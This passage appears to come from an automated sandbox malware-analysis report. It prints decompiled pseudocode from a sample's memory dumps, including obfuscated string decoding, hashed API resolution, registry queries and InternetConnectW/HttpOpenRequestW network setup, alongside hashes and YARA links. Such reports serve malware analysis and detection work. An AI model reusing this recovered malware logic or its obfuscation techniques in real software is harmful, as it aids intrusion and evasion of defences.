				_v12[0x12] = 0x6a;
				_v12[0x12] = (_v12[0x12] & 0x000000ff) - 0x33;
				_v12[0x13] = 0x60;
				_v12[0x13] = (_v12[0x13] & 0x000000ff) - 0x33;
				_v12[0x14] = 0x95;
				_v12[0x14] = (_v12[0x14] & 0x000000ff) - 0x33;
				_v12[0x15] = 0x94;
				_v12[0x15] = (_v12[0x15] & 0x000000ff) - 0x33;
				_v12[0x16] = 0x95;
				_v12[0x16] = (_v12[0x16] & 0x000000ff) - 0x33;
				_v12[0x17] = 0x67;
				_v12[0x17] = (_v12[0x17] & 0x000000ff) - 0x33;
				_v12[0x18] = 0x60;
				_v12[0x18] = (_v12[0x18] & 0x000000ff) - 0x33;
				_v12[0x19] = 0x64;
				_v12[0x19] = (_v12[0x19] & 0x000000ff) - 0x33;
				_v12[0x1a] = 0x63;
				_v12[0x1a] = (_v12[0x1a] & 0x000000ff) - 0x33;
				_v12[0x1b] = 0x64;
				_v12[0x1b] = (_v12[0x1b] & 0x000000ff) - 0x33;
				_v12[0x1c] = 0x94;
				_v12[0x1c] = (_v12[0x1c] & 0x000000ff) - 0x33;
				_v12[0x1d] = 0x60;
				_v12[0x1d] = (_v12[0x1d] & 0x000000ff) - 0x33;
				_v12[0x1e] = 0x95;
				_v12[0x1e] = (_v12[0x1e] & 0x000000ff) - 0x33;
				_v12[0x1f] = 0x69;
				_v12[0x1f] = (_v12[0x1f] & 0x000000ff) - 0x33;
				_v12[0x20] = 0x6c;
				_v12[0x20] = (_v12[0x20] & 0x000000ff) - 0x33;
				_v12[0x21] = 0x96;
				_v12[0x21] = (_v12[0x21] & 0x000000ff) - 0x33;
				_v12[0x22] = 0x60;
				_v12[0x22] = (_v12[0x22] & 0x000000ff) - 0x33;
				_v12[0x23] = 0x63;
				_v12[0x23] = (_v12[0x23] & 0x000000ff) - 0x33;
				_v12[0x24] = 0x63;
				_v12[0x24] = (_v12[0x24] & 0x000000ff) - 0x33;
				_v12[0x25] = 0x94;
				_v12[0x25] = (_v12[0x25] & 0x000000ff) - 0x33;
				_v12[0x26] = 0x94;
				_v12[0x26] = (_v12[0x26] & 0x000000ff) - 0x33;
				_v12[0x27] = 0x63;
				_v12[0x27] = (_v12[0x27] & 0x000000ff) - 0x33;
				_v12[0x28] = 0x63;
				_v12[0x28] = (_v12[0x28] & 0x000000ff) - 0x33;
				_v12[0x29] = 0x66;
				_v12[0x29] = (_v12[0x29] & 0x000000ff) - 0x33;
				_v12[0x2a] = 0x67;
				_v12[0x2a] = (_v12[0x2a] & 0x000000ff) - 0x33;
				_v12[0x2b] = 0x64;
				_v12[0x2b] = (_v12[0x2b] & 0x000000ff) - 0x33;
				_v12[0x2c] = 0x97;
				_v12[0x2c] = (_v12[0x2c] & 0x000000ff) - 0x33;
				_v12[0x2d] = 0x63;
				_v12[0x2d] = (_v12[0x2d] & 0x000000ff) - 0x33;
				_v12[0x2e] = 0x6a;
				_v12[0x2e] = (_v12[0x2e] & 0x000000ff) - 0x33;
				_v12[0x2f] = 0xb0;
				_v12[0x2f] = (_v12[0x2f] & 0x000000ff) - 0x33;
				E100010E0(_v12);
				_t536 =  *0x10008000; // 0x80074ea8
				_t374 = RegOpenKeyA(_t536 - 0x74ea8, _v12, 0x10009da8);
				_v8 = _t374;
				if(_v8 != 0) {
					while(1) {
						_t374 = 1;
						if(1 == 0) {
							goto L4;
						}
					}
				}
				L4:
				return _t374;
			}

0x1000221b
0x1000221e
0x10002228
0x10002237
0x1000223c
0x10002243
0x1000224d
0x10002253
0x1000225a
0x10002264
0x1000226a
0x10002271
0x1000227b
0x10002281
0x10002288
0x10002292
0x10002298
0x1000229f
0x100022a9
0x100022af
0x100022b6
0x100022c0
0x100022c6
0x100022cd
0x100022d7
0x100022dd
0x100022e4
0x100022ee
0x100022f4
0x100022fb
0x10002305
0x1000230b
0x10002312
0x1000231c
0x10002322
0x10002329
0x10002333
0x10002339
0x10002340
0x1000234a
0x10002350
0x10002357
0x10002361
0x10002367
0x1000236e
0x10002378
0x1000237e
0x10002385
0x1000238f
0x10002395
0x100023a6
0x100023ac
0x100023bd
0x100023c3
0x100023d4
0x100023da
0x100023eb
0x100023f1
0x10002402
0x10002408
0x10002419
0x1000241f
0x10002430
0x10002436
0x10002447
0x1000244d
0x1000245e
0x10002464
0x10002475
0x1000247b
0x1000248c
0x10002492
0x100024a3
0x100024a9
0x100024ba
0x100024c0
0x100024d1
0x100024d7
0x100024e8
0x100024ee
0x100024ff
0x10002505
0x10002516
0x1000251c
0x1000252d
0x10002533
0x10002544
0x1000254a
0x1000255b
0x10002561
0x10002572
0x10002578
0x10002589
0x1000258f
0x100025a0
0x100025a6
0x100025b7
0x100025bd
0x100025ce
0x100025d4
0x100025e5
0x100025eb
0x100025fc
0x10002602
0x10002613
0x10002619
0x1000262a
0x10002630
0x10002641
0x10002647
0x10002658
0x1000265e
0x1000266f
0x10002672
0x10002682
0x1000268f
0x10002692
0x10002699
0x1000269b
0x1000269b
0x100026a2
0x00000000
0x00000000
0x100026a4
0x1000269b
0x100026a9
0x100026a9

APIs

RegOpenKeyA.ADVAPI32(80000000,00000065,10009DA8), ref: 1000268F

Strings

interface\{b196b287-bab4-101a-b69c-00aa00341d07}, xrefs: 1000221E

Memory Dump Source

Source File: 00000004.00000002.2401225679.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2401219308.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401231871.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401235616.0000000010007000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401240914.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2401246497.000000001000A000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: interface\{b196b287-bab4-101a-b69c-00aa00341d07}
API String ID: 71445658-3721302963
Opcode ID: 70ef6df9e80d59e171016e5f198c43c6ef583eba1dce0ab0df92c18635fd71a9
Instruction ID: 82f1461fb5ecb5f7515817cf6212aeaf414af0ded347fa287ba6a42e94e12ce6
Opcode Fuzzy Hash: 70ef6df9e80d59e171016e5f198c43c6ef583eba1dce0ab0df92c18635fd71a9
Instruction Fuzzy Hash: 7712FB35A083C99FCB05CFA8C19499CFFB26F56220F1882C9D4D56B387C671D696CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003B1030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E003B1030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x3db1e0 == 0xe99c89bf) {
					_t9 = E003B15C0(0x588ab3ea, 0xc0b67de0);
					 *0x3db1e4 = E003B15C0(0x588ab3ea, 0x82d274c4);
					if( *0x3db1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x3db1e0 = 0;
					}
				}
				_t4 = E003B15C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_t1 = _t11 + 8; // 0x3b6c6a
					_push( *_t1);
					_push(8);
					_push( *0x3db1e0);
					asm("int3");
					return _t4;
				}
			}

0x003b103b
0x003b1073
0x003b1084
0x003b1093
0x003b109e
0x003b10a0
0x003b10a0
0x003b1093
0x003b1047
0x003b104e
0x003b1063
0x003b1050
0x003b1050
0x003b1050
0x003b1054
0x003b1056
0x003b105c
0x003b105d
0x003b105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,003B8864,00000000,00000000,00000000,?), ref: 003B109E

Strings

jl;, xrefs: 003B1050

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: CreateHeap
String ID: jl;
API String ID: 10892065-3259128427
Opcode ID: 06977382e6bd30ef137b01e3d47a038e45650d28d110baf6f5207cee6cbb8a2e
Instruction ID: 343cc83bf4b6bbaf011d02a11d63ba6e1b0e14ff6d3b59829d9edec91f2c5b5a
Opcode Fuzzy Hash: 06977382e6bd30ef137b01e3d47a038e45650d28d110baf6f5207cee6cbb8a2e
Instruction Fuzzy Hash: 59F0A738001245FEE323AF717C36AB977DCEB003D8F81041BF70594991FB2045508326

Uniqueness

Uniqueness Score: -1.00%

Function 003D3370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E003D3370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E003C06A0( &(_t254[4]), __ecx, 0);
				E003C06A0( &(_t254[8]), __ecx, 0);
				E003C06A0( &(_t254[0xc]), __ecx, 0);
				E003C06A0( &(_t254[0x10]), __ecx, 0);
				E003D4D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E003B8810( &(_t254[0x1e]), 0);
				E003B87A0( &(_t254[0x20]));
				E003B87A0( &(_t254[0x24]));
				_t102 = E003C0220( &(_t254[0x20]), _t254[0x26], 0);
				E003B87A0( &(_t254[0x28]));
				E003C0220(_t102, _t254[0x2a], 0);
				E003B8CA0( &(_t254[0x28]));
				E003B8CA0( &(_t254[0x24]));
				if(E003C1000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E003CD620(_t242, E003C6040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(E003B15C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = E003B15C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x3db248; // 0xcc0004
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E003B7F00();
							E003B8CA0( &(_t254[0x20]));
							E003B8CA0( &(_t254[0x1c]));
							E003C0B10( &(_t254[0xe]));
							E003C0B10( &(_t254[0xa]));
							E003C0B10( &(_t254[6]));
							E003C0B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = E003B15C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = E003B15C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E003B7B30(_t155 - 1,  &(_t254[0x18]), 0x3daa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E003B8CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E003B7F00();
										E003B8CA0( &(_t254[0x20]));
										E003B8CA0( &(_t254[0x1c]));
										E003C0B10( &(_t254[0xe]));
										E003C0B10( &(_t254[0xa]));
										E003C0B10( &(_t254[6]));
										E003C0B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x3db244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E003D2760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x3db27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E003D2810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E003B10E0(0);
											_t230 =  *0x3db27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = E003B15C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = E003B15C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = E003B15C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = E003B15C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E003B8CA0( &(_t254[0x20]));
										E003B8CA0( &(_t254[0x1c]));
										E003C0B10( &(_t254[0xe]));
										E003C0B10( &(_t254[0xa]));
										E003C0B10( &(_t254[6]));
										E003C0B10( &(_t254[2]));
										return 1;
									}
								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = E003B15C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = E003B15C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x003d3374
0x003d3377
0x003d337d
0x003d337f
0x003d3389
0x003d3394
0x003d339f
0x003d33aa
0x003d33b4
0x003d33b9
0x003d33c2
0x003d33cf
0x003d33dc
0x003d33eb
0x003d33fa
0x003d3407
0x003d3410
0x003d3419
0x003d3429
0x003d342b
0x003d343f
0x003d3449
0x003d3454
0x003d3459
0x003d345b
0x003d345b
0x003d344b
0x003d344b
0x003d344b
0x003d3449
0x003d3475
0x003d37cf
0x003d37d3
0x003d3804
0x003d3804
0x003d3808
0x00000000
0x003d37d5
0x003d37d5
0x003d37d8
0x003d37da
0x003d37e5
0x003d37e5
0x003d37dc
0x003d37dc
0x003d37df
0x00000000
0x003d37e1
0x003d37e1
0x003d37e1
0x003d37df
0x003d37ea
0x003d37ec
0x00000000
0x003d37ee
0x003d37f8
0x003d37fd
0x003d37ff
0x00000000
0x003d3801
0x003d3801
0x003d3802
0x003d3803
0x003d3803
0x003d37ff
0x003d37ec
0x003d347b
0x003d3486
0x003d348c
0x003d348e
0x003d3494
0x003d34c5
0x003d34c5
0x003d34c9
0x003d34cc
0x003d34ce
0x003d34d9
0x003d34d9
0x003d34d0
0x003d34d0
0x003d34d3
0x00000000
0x003d34d5
0x003d34d5
0x003d34d5
0x003d34d3
0x003d34de
0x003d34e0
0x003d36e0
0x003d36e7
0x003d36f0
0x003d36f9
0x003d3702
0x003d370b
0x003d3714
0x003d3719
0x003d3722
0x003d34e6
0x003d34e6
0x003d34ea
0x003d34f6
0x003d34ec
0x003d34ec
0x003d34ec
0x003d3508
0x003d350f
0x003d3511
0x003d3788
0x003d378c
0x003d37bd
0x003d37bd
0x003d37c1
0x003d37c3
0x00000000
0x003d378e
0x003d378e
0x003d3791
0x003d3793
0x003d379e
0x003d379e
0x003d3795
0x003d3795
0x003d3798
0x00000000
0x003d379a
0x003d379a
0x003d379a
0x003d3798
0x003d37a3
0x003d37a5
0x00000000
0x003d37a7
0x003d37b1
0x003d37b6
0x003d37b8
0x00000000
0x003d37ba
0x003d37ba
0x003d37bb
0x003d37bc
0x003d37bc
0x003d37b8
0x003d37a5
0x003d3517
0x003d3517
0x003d351a
0x003d3524
0x003d352e
0x003d3544
0x003d3546
0x003d3548
0x003d354c
0x003d357d
0x003d357d
0x003d3584
0x003d3588
0x003d358d
0x003d3590
0x003d3592
0x003d359d
0x003d359d
0x003d3594
0x003d3594
0x003d3597
0x00000000
0x003d3599
0x003d3599
0x003d3599
0x003d3597
0x003d35a2
0x003d35a4
0x003d3743
0x003d374a
0x003d3753
0x003d375c
0x003d3765
0x003d376e
0x003d3777
0x003d377c
0x003d3785
0x003d35aa
0x003d35aa
0x003d35af
0x003d35b4
0x003d35be
0x003d35c3
0x003d35c8
0x003d35c8
0x003d35cc
0x00000000
0x00000000
0x003d35d2
0x003d35d3
0x003d35d9
0x00000000
0x00000000
0x003d35db
0x003d35df
0x00000000
0x003d35df
0x003d3727
0x003d372a
0x003d372f
0x003d3735
0x00000000
0x003d3735
0x003d35e4
0x003d35e4
0x003d35e7
0x003d35e9
0x003d35f1
0x003d3604
0x003d3606
0x003d3608
0x003d3616
0x003d3616
0x003d3627
0x003d3629
0x003d362b
0x003d3639
0x003d3639
0x003d362b
0x003d363b
0x003d3652
0x003d3654
0x003d3656
0x003d3667
0x003d3667
0x003d3669
0x003d3680
0x003d3682
0x003d3684
0x003d3694
0x003d3694
0x003d369a
0x003d36a3
0x003d36ac
0x003d36b5
0x003d36be
0x003d36c7
0x003d36d8
0x003d36d8
0x003d354e
0x003d354e
0x003d3551
0x003d3553
0x003d355e
0x003d355e
0x003d3555
0x003d3555
0x003d3558
0x00000000
0x003d355a
0x003d355a
0x003d355a
0x003d3558
0x003d3563
0x003d3565
0x00000000
0x003d3567
0x003d3571
0x003d3576
0x003d3578
0x00000000
0x003d357a
0x003d357a
0x003d357b
0x003d357c
0x003d357c
0x003d3578
0x003d3565
0x003d354c
0x003d3511
0x003d3496
0x003d3496
0x003d349b
0x003d34a6
0x003d34a2
0x003d34a2
0x003d34a2
0x003d34ad
0x00000000
0x003d34af
0x003d34b9
0x003d34c0
0x00000000
0x003d34c2
0x003d34c2
0x003d34c3
0x003d34c4
0x003d34c4
0x003d34c0
0x003d34ad
0x003d3494

APIs

InternetConnectW.WININET(00CC0004,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 003D348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,003DAA40,A1310F65,D27F045A,8813E141), ref: 003D3544

Part of subcall function 003B10E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B1124

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: 5faf792f145c4e09afc5c0a0a3f5b8b0478464e4c439eccca1aec466954abd51
Instruction ID: b7b714c488a6570017f5414f90a251cf2a217bde85553407c61c40acae951866
Opcode Fuzzy Hash: 5faf792f145c4e09afc5c0a0a3f5b8b0478464e4c439eccca1aec466954abd51
Instruction Fuzzy Hash: D1C1F371204341ABD717EF24EC91BAFBBA8AF91354F14482EF5518A391EB71DE04C762

Uniqueness

Uniqueness Score: -1.00%

Function 003CCAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E003CCAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E003C9350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E003B87A0(_t129);
						if(E003B15C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E003C9670(_t146 + 0x14, _t89);
							if(E003B15C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E003C9640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E003B8CA0(_t146 + 8);
						} else {
							E003B8CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = E003B15C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E003C9640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E003B8810(_t146, _t101);
					_t144 = E003B15C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E003C9640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E003B88C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E003B8CA0(_t146);
					E003C9510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E003B8810( *((intOrPtr*)(_t146 + 0x44)), 0);
							E003C9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E003B8AB0( *((intOrPtr*)(_t146 + 0x48)), E003C9640(_t146 + 0x14, 0), 0);
							E003C9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E003B8810(_t146 + 4, 0);
						_t102 = E003C9640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E003C0180( *_t146, 0x7fffffff, _t142) != 0) {
								E003B96D0(_t146 + 4, 0xa);
							}
							E003B8AB0(_t146 + 0x30, _t102, 0);
							E003C0220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E003C0180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E003B8CA0(_t146 + 0x28);
						}
						E003B88C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E003B8CA0(_t146);
						E003C9510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x003ccae6
0x003ccae8
0x003ccaee
0x003ccaf3
0x003ccaf8
0x003ccb03
0x003ccaff
0x003ccaff
0x003ccaff
0x003ccb0a
0x003ccb6b
0x003ccb6b
0x003ccb0c
0x003ccb0c
0x003ccb12
0x003ccb1b
0x003ccb1f
0x003ccb22
0x003ccb25
0x003ccb3d
0x003ccb54
0x003ccb54
0x003ccb56
0x003ccb5c
0x003ccd05
0x003ccd1d
0x003ccd1f
0x003ccd42
0x003ccd42
0x003ccd44
0x003ccd4c
0x003ccb62
0x003ccb66
0x00000000
0x003ccb66
0x00000000
0x00000000
0x00000000
0x003ccb12
0x003ccb70
0x003ccc84
0x003ccc88
0x003ccc94
0x003ccca0
0x003ccca2
0x003ccc8a
0x003ccc8a
0x003ccc8a
0x003ccca8
0x003cccbc
0x003cccc0
0x003cccc8
0x003cccd3
0x003cccd3
0x003cccdd
0x003ccce5
0x003cccee
0x003cccfd
0x003ccb76
0x003ccb79
0x003ccc25
0x003ccc5a
0x003ccc63
0x003ccc72
0x003ccc27
0x003ccc39
0x003ccc42
0x003ccc51
0x003ccc51
0x003ccb7f
0x003ccb85
0x003ccb95
0x003ccb9c
0x003ccbad
0x003ccbb5
0x003ccbb5
0x003ccbc1
0x003ccbd0
0x003ccbe7
0x003ccbeb
0x003ccbf3
0x003ccbff
0x003ccc07
0x003ccc10
0x003ccc1f
0x003ccc1f
0x003ccb79

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 003CCB54

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction ID: 4fea17c7797c19f14b02735f40548a1511e3388fe1decc906f36cbd0f1a0f929
Opcode Fuzzy Hash: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction Fuzzy Hash: 0C617270214201ABD716EF64CC92FABB3E8AF95744F40492DF68ADA1D1EE21ED05C762

Uniqueness

Uniqueness Score: -1.00%

Function 003CC790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E003CC790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E003C9350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					E003C9510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
